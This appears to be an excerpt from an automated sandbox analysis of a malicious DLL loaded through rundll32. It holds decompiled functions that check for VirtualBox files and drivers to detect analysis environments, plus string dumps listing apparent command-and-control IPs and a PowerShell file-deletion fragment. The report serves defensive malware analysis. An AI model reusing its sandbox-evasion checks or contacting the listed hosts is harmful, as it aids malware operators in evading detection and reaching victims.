                                        				asm("int3");
                                        				asm("int3");
                                        				_t86 = _t82;
                                        				 *((long long*)(_t86 - 0x38)) = 0xfffffffe;
                                        				 *((long long*)(_t86 - 0x20)) = 0xf319d200;
                                        				 *((long long*)(_t86 - 0x18)) = 0xf319d200;
                                        				 *((long long*)(_t86 - 0x10)) = 0xf319d200;
                                        				 *((long long*)(_t86 - 0x30)) = "invalid iterator";
                                        				_v128 = 1;
                                        				E0000021E21EF310E0E4(_t66, _t86 - 0x30, _t86 - 0x18, _t80, _t81);
                                        				_v120 = 0xf319d240;
                                        				r9d = 0xc2;
                                        				_t77 = "class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,5> &) const";
                                        				_t70 =  &_v120;
                                        				E0000021E21EF3010190(0xf319d240, _t66, _t70, _t77, _t80);
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				_v160 = _t77;
                                        				_v232 = 0xfffffffe;
                                        				if ( *((char*)(_t70 + 0x20)) != 6) goto 0xf3013356;
                                        				_t62 = _t70 + 8;
                                        				 *_t62 =  *_t62 + 2;
                                        				if ( *_t62 != 0xf3204a36) goto 0xf30133b3;
                                        				_t49 =  *(_t62 + 0x18) & 0x000000ff;
                                        				if (_t49 == 0) goto 0xf3013350;
                                        				if (_t49 != 1) goto 0xf301334c;
                                        				_v160 = _t62;
                                        				if ( *((char*)(_t62 + 0x10)) == 0) goto 0xf301334c;
                                        				 *((char*)(_t62 + 0x10)) = 0;
                                        				 *(_t62 + 0x18) = 0;
                                        				 *(_t62 + 0x18) = 7;
                                        				goto 0xf30133b3;
                                        				_v208 = 0xf319d200;
                                        				_v200 = 0xf319d200;
                                        				_v192 = 0xf319d200;
                                        				_v224 = "invalid iterator";
                                        				_v216 = 1;
                                        				E0000021E21EF310E0E4(_t66,  &_v224,  &_v200, _t80, _t81);
                                        				_v208 = 0xf319d240;
                                        				r9d = 0xd9;
                                        				return E0000021E21EF3010190(0xf319d240, _t66,  &_v208, "void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf> >,class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,6> &)", _t80);
                                        			}

























                                        APIs
                                        Strings
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::co, xrefs: 0000021EF3013274
                                        • invalid iterator, xrefs: 0000021EF3013244
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::co$invalid iterator
                                        • API String ID: 1552479455-1144222080
                                        • Opcode ID: ff2a5577497901d73301ed261088f2f07695bc4bb9fc64c70a55e106d006a1e8
                                        • Instruction ID: c81ef1e771c42bcc6b932a3b53119d8a3aff2929aded487c38785d58af70ced0
                                        • Opcode Fuzzy Hash: ff2a5577497901d73301ed261088f2f07695bc4bb9fc64c70a55e106d006a1e8
                                        • Instruction Fuzzy Hash: 85F0A932325F4494DB40DB14E88829E33B5B354364F925335DEBD47BA5EB79C556C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF300F7B4
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::bea, xrefs: 0000021EF300F7E4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::bea$invalid iterator
                                        • API String ID: 1552479455-1958624756
                                        • Opcode ID: 2c99ee0430621d879f49c29174ada56f92ace1776ddcd71bc9e0b2087642e26f
                                        • Instruction ID: ab3629cdc0ac63e5507547706b9abe28312254633d459fc723637ee62421651a
                                        • Opcode Fuzzy Hash: 2c99ee0430621d879f49c29174ada56f92ace1776ddcd71bc9e0b2087642e26f
                                        • Instruction Fuzzy Hash: 55F0F932325F4494EB40DB14E88828E33B6B354360F524325DEBD47BA1EF79C556C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 60%
                                        			E0000021E21EF3001E80(long long __rax, long long __rbx, long long __rsi, long long _a8, long long _a16) {
                                        				long long _v16;
                                        				intOrPtr _v24;
                                        				long long _v32;
                                        				long long _v40;
                                        				long _t10;
                                        				void* _t12;
                                        				long _t13;
                                        				long long _t17;
                                        				void* _t21;
                                        				void* _t23;
                                        
                                        				_t17 = __rax;
                                        				_v40 = 0xfffffffe;
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				_v32 = 0xf320b688;
                                        				_t10 = TlsAlloc();
                                        				if (_t10 != 0xffffffff) goto 0xf3001ede;
                                        				_t13 = GetLastError();
                                        				_t12 = E0000021E21EF310D880(_t21, _t23);
                                        				_v24 = _t13;
                                        				_v16 = _t17;
                                        				if (_t13 == 0) goto 0xf3001ede;
                                        				0xf2fee680();
                                        				asm("int3");
                                        				 *0xf320b688 = _t10;
                                        				return _t12;
                                        			}














                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocErrorExceptionInit_thread_footerLastThrow__std_exception_copy
                                        • String ID: tss
                                        • API String ID: 1176384431-1638339373
                                        • Opcode ID: c66cd73c7aa0eac1c00c9ada76600de5f76c2fd3cc8cac3decf1b725954ce2c9
                                        • Instruction ID: ea81af159c8f3d7d0d331d6c1b4dd15d7608159946dafd9c842c18d6844bd4a2
                                        • Opcode Fuzzy Hash: c66cd73c7aa0eac1c00c9ada76600de5f76c2fd3cc8cac3decf1b725954ce2c9
                                        • Instruction Fuzzy Hash: C0F0FF76614B9082EE109B65BC8818EA3B4F794BB0F560315EEA543FE9DF7CC556CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::bea, xrefs: 0000021EF3013964
                                        • invalid iterator, xrefs: 0000021EF3013934
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::bea$invalid iterator
                                        • API String ID: 1552479455-1958624756
                                        • Opcode ID: f9cb10991de64b17ebd7da1a7a7a2e4f0b69b10be19076ba350ae9fef8477257
                                        • Instruction ID: 0bfb35e8639a49bdd82801ca1279ef80a99259c2c8cb48f7422e7732c473d590
                                        • Opcode Fuzzy Hash: f9cb10991de64b17ebd7da1a7a7a2e4f0b69b10be19076ba350ae9fef8477257
                                        • Instruction Fuzzy Hash: 9DF01932326F4594DA40DB14E89829D33A5F364360F524625DEBE47BA1EB39C556C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0000021E21EF2FEE9E0(long long __rbx, long long __rcx, intOrPtr* __rdx, long long* __r8, void* __r9) {
                                        				void* _t28;
                                        				long long _t48;
                                        				intOrPtr _t49;
                                        				intOrPtr* _t55;
                                        				intOrPtr _t58;
                                        				intOrPtr _t64;
                                        				intOrPtr _t74;
                                        				intOrPtr _t76;
                                        				long long _t80;
                                        				void* _t83;
                                        
                                        				 *((long long*)(_t83 + 0x20)) = 0xfffffffe;
                                        				 *((long long*)(_t83 + 0x68)) = __rbx;
                                        				 *((long long*)(_t83 + 0x70)) = _t80;
                                        				 *((long long*)(_t83 + 0x28)) = __rcx;
                                        				EnterCriticalSection(??);
                                        				 *((char*)(_t83 + 0x30)) = 1;
                                        				_t74 =  *((intOrPtr*)(__rcx + 0x30));
                                        				if (_t74 == 0) goto 0xf2feea6b;
                                        				_t48 =  *((intOrPtr*)(_t74 + 0x10));
                                        				if (_t48 == 0) goto 0xf2feea3c;
                                        				_t58 =  *((intOrPtr*)(__rdx + 8));
                                        				if (_t58 == 0) goto 0xf2feea3c;
                                        				if (_t48 == _t58) goto 0xf2feeb10;
                                        				if ( *((intOrPtr*)(_t74 + 8)) == 0) goto 0xf2feea62;
                                        				if ( *__rdx == 0) goto 0xf2feea62;
                                        				if (E0000021E21EF310E19C( *((intOrPtr*)(_t74 + 8)) + 8,  *__rdx + 8) == 0) goto 0xf2feeb10;
                                        				if ( *((intOrPtr*)(_t74 + 0x20)) != 0) goto 0xf2feea21;
                                        				LeaveCriticalSection(??);
                                        				 *((char*)(_t83 + 0x30)) = 0;
                                        				 *__r8();
                                        				_t55 = _t48;
                                        				 *((long long*)(_t83 + 0x60)) = _t48;
                                        				asm("movups xmm0, [esi]");
                                        				asm("movups [eax+0x8], xmm0");
                                        				EnterCriticalSection(??);
                                        				 *((char*)(_t83 + 0x30)) = 1;
                                        				_t76 =  *((intOrPtr*)(__rcx + 0x30));
                                        				if (_t76 == 0) goto 0xf2feeae7;
                                        				_t49 =  *((intOrPtr*)(_t76 + 0x10));
                                        				if (_t49 == 0) goto 0xf2feeabc;
                                        				_t64 =  *((intOrPtr*)(__rdx + 8));
                                        				if (_t64 == 0) goto 0xf2feeabc;
                                        				if (_t49 == _t64) goto 0xf2feeafd;
                                        				if ( *((intOrPtr*)(_t76 + 8)) == 0) goto 0xf2feeade;
                                        				if ( *__rdx == 0) goto 0xf2feeade;
                                        				if (E0000021E21EF310E19C( *((intOrPtr*)(_t76 + 8)) + 8,  *__rdx + 8) == 0) goto 0xf2feeafd;
                                        				if ( *((intOrPtr*)(_t76 + 0x20)) != 0) goto 0xf2feeaa5;
                                        				 *((long long*)(_t55 + 0x20)) =  *((intOrPtr*)(__rcx + 0x30));
                                        				 *((long long*)(__rcx + 0x30)) = _t55;
                                        				 *((long long*)(_t83 + 0x60)) = _t55;
                                        				if (_t55 == 0) goto 0xf2feeb10;
                                        				_t28 =  *((intOrPtr*)( *_t55))();
                                        				LeaveCriticalSection(??);
                                        				return _t28;
                                        			}














                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3168844106-0
                                        • Opcode ID: 1c489b95e9b53e891c7b99cec89d2013ba3dde76873832c0f54ee565194db6cf
                                        • Instruction ID: c9048c928e62b1550607658427fc3f1a161ac02ff70cea2873a2675f2af91c70
                                        • Opcode Fuzzy Hash: 1c489b95e9b53e891c7b99cec89d2013ba3dde76873832c0f54ee565194db6cf
                                        • Instruction Fuzzy Hash: 7E418732311F4146EE568F16E94439963A1FBA5FE0F0985289E9F17F98DF78D4928340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:1.4%
                                        Dynamic/Decrypted Code Coverage:0.2%
                                        Signature Coverage:0%
                                        Total number of Nodes:613
                                        Total number of Limit Nodes:40
58948->58945 58949->58945 58952 1c33880c290 _handle_error 4 API calls 58950->58952 58951->58947 58953 1c33871ff34 58952->58953 58954 1c33871f730 58955 1c3387211c0 8 API calls 58954->58955 58956 1c33871f760 _com_util::ConvertStringToBSTR 58955->58956 58957 1c33871f9a7 58956->58957 58958 1c33871f805 58956->58958 58960 1c33871f7fc SysFreeString 58956->58960 58963 1c33871f7f6 CoUninitialize 58956->58963 58959 1c33871f812 SysFreeString 58958->58959 58966 1c33871f81b wcsstr 58958->58966 58959->58966 58960->58958 58961 1c33871f994 58962 1c33871f96e CoUninitialize 58962->58961 58963->58960 58965 1c33871f8cd VariantClear 58965->58966 58966->58961 58966->58962 58966->58965 58967 1c33871f949 VariantClear 58966->58967 58967->58966 58974 1c338720370 58975 1c33872042c fread_s 58974->58975 58976 1c33872043d GetWindowsDirectoryW 58975->58976 58977 1c338720e50 GetCurrentProcess 58976->58977 58978 1c33872045b 58977->58978 58979 1c33872045f Wow64DisableWow64FsRedirection 58978->58979 58981 1c33872046a fread_s 58978->58981 58979->58981 58980 1c338720470 PathCombineW 58980->58981 58981->58980 58982 1c3387204b6 GetFileAttributesW 58981->58982 58986 1c3387204d2 58981->58986 58982->58981 58983 1c338720500 58984 1c33880c290 _handle_error 4 API calls 58983->58984 58985 1c338720572 58984->58985 58986->58983 58987 1c33872053f GetCurrentProcess 58986->58987 58988 1c33872054f 58987->58988 58988->58983 58989 1c338720556 Wow64RevertWow64FsRedirection 58988->58989 58989->58983 58990 1c338720770 58991 1c338720879 58990->58991 58992 1c338720881 GetUserNameW 58991->58992 58997 1c338720893 58991->58997 58995 1c3387208b9 58992->58995 58992->58997 58993 1c33880c290 _handle_error 4 API calls 58994 1c3387208b0 58993->58994 58995->58997 58998 1c338820790 18 API calls 3 library calls 58995->58998 58997->58993 58998->58995

                                        Control-flow Graph

                                        C-Code - Quality: 48%
                                        			E000001C31C33871E430(long long __rbx, signed long long __rdi, long long __rsi) {
                                        				signed char _t66;
                                        				void* _t73;
                                        				void* _t81;
                                        				void* _t85;
                                        				signed long long _t98;
                                        				signed long long _t119;
                                        				void* _t140;
                                        				signed long long _t145;
                                        				WCHAR* _t150;
                                        				void* _t151;
                                        				void* _t153;
                                        				signed long long _t154;
                                        				void* _t156;
                                        
                                        				_t145 = __rdi;
                                        				 *((long long*)(_t153 + 8)) = __rbx;
                                        				 *((long long*)(_t153 + 0x10)) = __rsi;
                                        				 *((long long*)(_t153 + 0x18)) = __rdi;
                                        				_t151 = _t153 - 0x5f0;
                                        				_t154 = _t153 - 0x6f0;
                                        				_t98 =  *0x38903000; // 0x9bfaf736ae76
                                        				 *(_t151 + 0x5e0) = _t98 ^ _t154;
                                        				 *((long long*)(_t154 + 0x30)) = L"System32\\drivers\\VBoxMouse.sys";
                                        				r8d = 0x208;
                                        				 *((long long*)(_t154 + 0x38)) = L"System32\\drivers\\VBoxGuest.sys";
                                        				 *((long long*)(_t154 + 0x40)) = L"System32\\drivers\\VBoxSF.sys";
                                        				 *((long long*)(_t154 + 0x48)) = L"System32\\drivers\\VBoxVideo.sys";
                                        				 *((long long*)(_t154 + 0x50)) = L"System32\\vboxdisp.dll";
                                        				 *((long long*)(_t154 + 0x58)) = L"System32\\vboxhook.dll";
                                        				 *((long long*)(_t154 + 0x60)) = L"System32\\vboxmrxnp.dll";
                                        				 *((long long*)(_t154 + 0x68)) = L"System32\\vboxogl.dll";
                                        				 *((long long*)(_t154 + 0x70)) = L"System32\\vboxoglarrayspu.dll";
                                        				 *((long long*)(_t154 + 0x78)) = L"System32\\vboxoglcrutil.dll";
                                        				 *((long long*)(_t151 - 0x80)) = L"System32\\vboxoglerrorspu.dll";
                                        				 *((long long*)(_t151 - 0x78)) = L"System32\\vboxoglfeedbackspu.dll";
                                        				 *((long long*)(_t151 - 0x70)) = L"System32\\vboxoglpackspu.dll";
                                        				 *((long long*)(_t151 - 0x68)) = L"System32\\vboxoglpassthroughspu.dll";
                                        				 *((long long*)(_t151 - 0x60)) = L"System32\\vboxservice.exe";
                                        				 *((long long*)(_t151 - 0x58)) = L"System32\\vboxtray.exe";
                                        				 *((long long*)(_t151 - 0x50)) = L"System32\\VBoxControl.exe";
                                        				E000001C31C33880E410(_t73, 0, _t81, _t85, _t151 + 0x1d0, _t140, __rdi, _t156);
                                        				r8d = 0x208;
                                        				E000001C31C33880E410(_t73, 0, _t81, _t85, _t151 - 0x40, _t140, _t145, _t156);
                                        				 *(_t154 + 0x28) = _t145;
                                        				GetWindowsDirectoryW(_t150);
                                        				if (E000001C31C338720E50() == 0) goto 0x3871e577;
                                        				__imp__Wow64DisableWow64FsRedirection();
                                        				_t119 = _t145;
                                        				__imp__PathCombineW();
                                        				r8d = 0x200;
                                        				E000001C31C33880E410(_t73, 0, 0, _t85, _t151 + 0x3e0, _t151 + 0x1d0, _t145,  *((intOrPtr*)(_t154 + 0x30 + _t119 * 8)));
                                        				0x3871e130();
                                        				_t66 = GetFileAttributesW(??); // executed
                                        				if (_t66 == 0xffffffff) goto 0x3871e5d9;
                                        				if ((_t66 & 0x00000010) == 0) goto 0x3871e5e4;
                                        				if (_t119 + 1 - 0x11 < 0) goto 0x3871e580;
                                        				goto 0x3871e5e9;
                                        				 *((intOrPtr*)(_t154 + 0x20)) = 0;
                                        				if ( *0x38904490 == 8) goto 0x3871e612;
                                        				if (1 - 0x1e < 0) goto 0x3871e600;
                                        				goto 0x3871e671;
                                        				if ( *0x1C3389044E4 == dil) goto 0x3871e671;
                                        				if ( *0x38904490 == 8) goto 0x3871e63a;
                                        				if (1 - 0x1e < 0) goto 0x3871e628;
                                        				goto 0x3871e64f;
                                        				if ( *((intOrPtr*)(0x1c3389044e4)) == dil) goto 0x3871e64f;
                                        				GetCurrentProcess();
                                        				 *((long long*)( *0x1C3389044E8))();
                                        				if ( *((intOrPtr*)(_t154 + 0x20)) == 0) goto 0x3871e671;
                                        				__imp__Wow64RevertWow64FsRedirection();
                                        				E000001C31C33880C290();
                                        				return 1;
                                        			}

















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                                        • String ID: Checking file %s $System32\VBoxControl.exe$System32\drivers\VBoxGuest.sys$System32\drivers\VBoxMouse.sys$System32\drivers\VBoxSF.sys$System32\drivers\VBoxVideo.sys$System32\vboxdisp.dll$System32\vboxhook.dll$System32\vboxmrxnp.dll$System32\vboxogl.dll$System32\vboxoglarrayspu.dll$System32\vboxoglcrutil.dll$System32\vboxoglerrorspu.dll$System32\vboxoglfeedbackspu.dll$System32\vboxoglpackspu.dll$System32\vboxoglpassthroughspu.dll$System32\vboxservice.exe$System32\vboxtray.exe
                                        • API String ID: 2137468328-1036852472
                                        • Opcode ID: aa2e16ca087441f2ea2c4c29c136bfb4107812c7c7544892d5e57efb955406d6
                                        • Instruction ID: f9138dda25ae0f135dffb05e7e0eba160cfad2e1234d6796825a0edb0ed7da49
                                        • Opcode Fuzzy Hash: aa2e16ca087441f2ea2c4c29c136bfb4107812c7c7544892d5e57efb955406d6
                                        • Instruction Fuzzy Hash: 99618B32250F8096FB11DB14E8446DA73A6FB84784F94A127DDAD07B64EF38C784C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 21%
                                        			E000001C31C33871EC20(void* __edx, long long __rbx, long long __rdi, long long __rsi, long long __r14) {
                                        				void* _t80;
                                        				void* _t81;
                                        				signed char _t87;
                                        				void* _t88;
                                        				intOrPtr _t91;
                                        				void* _t107;
                                        				signed long long _t128;
                                        				long long _t132;
                                        				intOrPtr* _t151;
                                        				long long _t187;
                                        				void* _t189;
                                        				void* _t190;
                                        				signed long long _t191;
                                        				long long _t201;
                                        				void* _t205;
                                        
                                        				_t187 = __rsi;
                                        				_t189 = _t190 - 0x47;
                                        				_t191 = _t190 - 0xb0;
                                        				_t128 =  *0x38903000; // 0x9bfaf736ae76
                                        				 *(_t189 + 0x37) = _t128 ^ _t191;
                                        				r12d = 0;
                                        				 *((long long*)(_t189 + 0x1f)) = L"vboxvideo";
                                        				 *((long long*)(_t189 - 0x21)) = _t201;
                                        				 *((long long*)(_t189 + 0x27)) = L"VBoxVideoW8";
                                        				_t132 = L"VBoxWddm";
                                        				 *((long long*)(_t189 - 0x11)) = _t201;
                                        				 *((long long*)(_t189 + 0x2f)) = _t132;
                                        				r15d = r12d;
                                        				 *((long long*)(_t189 - 0x29)) = _t201;
                                        				_t81 = E000001C31C3387211C0(_t80, _t189 - 0x21, _t189 - 0x11, __rsi); // executed
                                        				if (_t81 == 0) goto 0x3871ef2b;
                                        				 *((long long*)(_t191 + 0xd0)) = __rbx;
                                        				 *((long long*)(_t191 + 0xd8)) = _t187;
                                        				 *((long long*)(_t191 + 0xe0)) = __rdi;
                                        				__imp__#2();
                                        				__imp__#2();
                                        				if (_t132 == 0) goto 0x3871ed20;
                                        				if (_t132 == 0) goto 0x3871ed17;
                                        				 *((long long*)(_t191 + 0x28)) = _t189 - 0x29;
                                        				_t18 = _t201 + 0x30; // 0x30
                                        				r9d = _t18;
                                        				 *((long long*)(_t191 + 0x20)) = _t201;
                                        				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x21)))) + 0xa0))() >= 0) goto 0x3871ed17;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x21)))) + 0x10))();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x11)))) + 0x10))();
                                        				__imp__CoUninitialize();
                                        				__imp__#6();
                                        				if (_t132 == 0) goto 0x3871ed2e;
                                        				__imp__#6();
                                        				if (r12d == 0) goto 0x3871eef7;
                                        				_t151 =  *((intOrPtr*)(_t189 - 0x29));
                                        				 *((long long*)(_t189 - 0x31)) = _t201;
                                        				 *((intOrPtr*)(_t189 - 0x35)) = r12d;
                                        				if (_t151 == 0) goto 0x3871eed7;
                                        				 *((long long*)(_t191 + 0xe8)) = __r14;
                                        				if (r15d != 0) goto 0x3871eecf;
                                        				 *((long long*)(_t191 + 0x20)) = _t189 - 0x35;
                                        				_t32 = _t205 + 1; // 0x1, executed
                                        				r8d = _t32;
                                        				 *((intOrPtr*)( *_t151 + 0x20))();
                                        				if ( *((intOrPtr*)(_t189 - 0x35)) == r12d) goto 0x3871eecb;
                                        				 *((long long*)(_t191 + 0x28)) = _t201;
                                        				r8d = 0;
                                        				 *((long long*)(_t191 + 0x20)) = _t201;
                                        				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))) + 0x20))() < 0) goto 0x3871eeb2;
                                        				_t87 =  *(_t189 - 9) & 0x0000ffff;
                                        				if (_t87 == 1) goto 0x3871eeb2;
                                        				if ((_t87 & 0x00000008) == 0) goto 0x3871eea8;
                                        				__imp__StrCmpIW();
                                        				if (_t87 != 0) goto 0x3871eea8;
                                        				__imp__#9();
                                        				 *((long long*)(_t191 + 0x28)) = _t201;
                                        				r8d = 0;
                                        				 *((long long*)(_t191 + 0x20)) = _t201;
                                        				_t88 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))) + 0x20))();
                                        				__imp__#23();
                                        				if (_t88 < 0) goto 0x3871eea8;
                                        				__imp__#20();
                                        				_t55 = _t205 + 1; // 0x1
                                        				__imp__#19();
                                        				_t107 =  *((intOrPtr*)(_t189 - 0x19)) -  *((intOrPtr*)(_t189 - 0x15)) + 1;
                                        				 *((intOrPtr*)(_t189 - 0x39)) = r12d;
                                        				if (_t107 <= 0) goto 0x3871ee9f;
                                        				__imp__#25(); // executed
                                        				if (E000001C31C338820790(_t55,  *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))),  *((intOrPtr*)(_t189 + 0xf)),  *((intOrPtr*)(_t189 + 0x1f))) == 0) goto 0x3871ee99;
                                        				if (r12d + 1 - 3 < 0) goto 0x3871ee70;
                                        				_t91 =  *((intOrPtr*)(_t189 - 0x39)) + 1;
                                        				 *((intOrPtr*)(_t189 - 0x39)) = _t91;
                                        				if (_t91 - _t107 < 0) goto 0x3871ee50;
                                        				goto 0x3871ee9f;
                                        				r15d = 1;
                                        				__imp__#24();
                                        				__imp__#9();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x31)))) + 0x10))();
                                        				if ( *((intOrPtr*)(_t189 - 0x29)) != 0) goto 0x3871ed53;
                                        				goto 0x3871eecf;
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x29)))) + 0x10))();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x21)))) + 0x10))();
                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t189 - 0x11)))) + 0x10))();
                                        				__imp__CoUninitialize(); // executed
                                        				E000001C31C33880C290();
                                        				return r15d;
                                        			}



















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ArraySafe$String$AllocBoundClearDataFreeUninitializeVariant$AccessElementInitializeUnaccess
                                        • String ID: FileName$SELECT * FROM Win32_NTEventlogFile$Sources$System$VBoxVideoW8$VBoxWddm$WQL$vboxvideo
                                        • API String ID: 1020912672-1865646205
                                        • Opcode ID: d8cd37143badf3434c6c21c4b3ccaeac9b5a595d6b550f084a82f7df2f32df9a
                                        • Instruction ID: e22cabbbd318ab7b172fb10e0d2fbe124d07ff45582128838a4f1d5dfddd418a
                                        • Opcode Fuzzy Hash: d8cd37143badf3434c6c21c4b3ccaeac9b5a595d6b550f084a82f7df2f32df9a
                                        • Instruction Fuzzy Hash: D7912336751A918AFB20CF65E854BDC33B1F788B88F40A512DE6A57B68DF38C649C311
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitHandleInitializeProcess$AddressCloseCreateErrorEventLastModuleProcSecurityUninitialize_invalid_parameter_noinfo
                                        • String ID: " -Force$2104a$282.19.133.12:443,91.122.18.192:443,185.156.172.62:443,72.123.65.11:443,149.255.35.167:443,172.241.27.146:443$3C29FEA2-6FE8-4BF9-B98A-0E3442115F67$444$; Remove-Item -Path "$BLACK$powershell$response_status$tasks
                                        • API String ID: 2740944658-2167360499
                                        • Opcode ID: 034357c79ffeb2bc058e87afe819c1f531048a7aaadc86a8783f0d4c1f95a398
                                        • Instruction ID: ccb16deffa5ae09fd602d04ab6a24d45aa553ebd3a228bcb0c4fbe326df62b2e
                                        • Opcode Fuzzy Hash: 034357c79ffeb2bc058e87afe819c1f531048a7aaadc86a8783f0d4c1f95a398
                                        • Instruction Fuzzy Hash: B0529872280BC48AFB20DF64D944BDD23A1FB51758F50A616DBA90BAEADF74C784C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
